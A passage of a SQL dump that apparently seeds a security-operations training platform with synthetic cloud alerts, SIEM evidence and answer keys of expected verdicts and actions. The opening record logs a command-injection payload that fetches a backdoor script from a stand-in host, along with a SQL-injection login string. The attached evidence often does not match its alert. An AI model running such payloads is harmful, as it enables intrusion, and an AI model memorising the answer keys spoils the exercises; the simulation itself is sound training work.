203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; 
wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget 
http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.768Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1306, 'Unauthorized IAM Role Assignment in AWS', 'high', 'AWS GuardDuty', 'An unauthorized IAM role was assigned to a user, potentially allowing elevated access to AWS resources.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T07:30:10Z\",\"event_type\":\"role_assignment\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":null,\"username\":\"jane.smith\",\"hostname\":\"aws-management-console\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-27 06:51:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for management console access\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized assignment of IAM roles can allow lateral movement within the AWS environment, indicating potential insider threat activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1307, 'Anomalous Data Transfer to External S3 Bucket', 'medium', 'AWS GuardDuty', 'Large data transfer detected from an internal server to an external Amazon S3 bucket, potentially indicating data exfiltration.', 'Data Exfiltration', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T09:00:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.20\",\"dst_ip\":\"54.240.196.186\",\"username\":\"data_user\",\"hostname\":\"data-transfer-server\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for data operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"54.240.196.186\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with unusual data transfer activities\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The large data transfer to an external S3 bucket without prior authorization suggests potential data exfiltration.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1308, 'False Positive: Legitimate Security Scan Detected as Anomalous', 'low', 'Azure Defender', 'Routine security scanning activity mistakenly identified as a potential threat due to high volume of network connections.', 'Network Scanning', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T02:10:20Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"scan_user\",\"hostname\":\"security-scanner\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for security scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address as scan target\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"The activity matches known security scanning patterns and originates from a trusted internal source.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1309, 'Unauthorized Access to Serverless Function Detected', 'high', 'AWS GuardDuty', 'An unauthorized user attempted to execute a sensitive serverless function, indicating a potential attempt to gain elevated privileges.', 'Execution', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T05:50:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"192.168.4.10\",\"username\":\"unauthorized_user\",\"hostname\":\"serverless-function-01\",\"request_body\":null,\"command_line\":\"aws lambda invoke --function-name sensitiveFunction\"}', '2026-02-24 03:24:16', '2026-02-27 06:51:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name sensitiveFunction\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used to invoke sensitive serverless functions without authorization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The use of an unauthorized account to access a sensitive function suggests a potential privilege escalation attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1310, 'False Positive: Legitimate Cloud Configuration Change', 'low', 'GCP SCC', 'A legitimate change in cloud configuration was incorrectly flagged as suspicious due to unusual pattern of activity.', 'Configuration Change', 'T1578', 0, 'Closed', 232, '{\"timestamp\":\"2026-02-24T11:20:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.5.25\",\"dst_ip\":null,\"username\":\"admin_user\",\"hostname\":\"gcp-console\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-03-09 18:23:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for cloud management\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized user performing regular maintenance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"configuration_change\",\"analysis_notes\":\"The activity corresponds to a scheduled maintenance window, and the user has proper permissions.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1311, 'Potential Exfiltration via Misconfigured S3 Bucket', 'high', 'AWS GuardDuty', 'Data exfiltration is suspected due to a misconfigured S3 bucket allowing public access to sensitive files.', 'Data Exfiltration', 'T1530', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T08:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.42\",\"dst_ip\":\"192.168.2.30\",\"username\":null,\"hostname\":\"public-s3-bucket\",\"request_body\":\"GET /sensitive-data.csv\",\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-27 06:52:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP known for accessing misconfigured public resources\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Request for potentially sensitive data\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The GET for sensitive-data.csv came from an external address against a bucket that allowed public reads, so the object must be treated as disclosed unless access logs prove otherwise. Blocking the requesting IP does not close the exposure: remove the public ACL or bucket policy and enable S3 Block Public Access, then review S3 server access logs or CloudTrail data events to enumerate every other reader of the object before deciding on notification.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 